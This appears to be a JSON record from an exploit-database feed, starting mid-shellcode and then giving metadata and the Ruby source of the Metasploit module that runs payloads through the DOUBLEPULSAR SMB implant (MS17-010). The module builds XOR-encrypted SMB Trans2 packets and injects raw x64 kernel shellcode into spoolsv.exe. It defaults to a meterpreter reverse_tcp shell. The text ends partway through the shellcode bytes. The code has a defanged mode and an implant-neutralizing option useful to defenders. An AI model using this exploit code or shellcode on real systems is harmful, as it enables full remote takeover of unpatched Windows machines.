+\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-28] #"}, "lastseen": "2021-10-27T22:18:11", "differentElements": ["sourceData"], "edition": 57}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "cb85d12da091a9bca505720b8b2fa6a2", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-28T22:16:57", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-28T22:16:57", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-28T22:16:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n 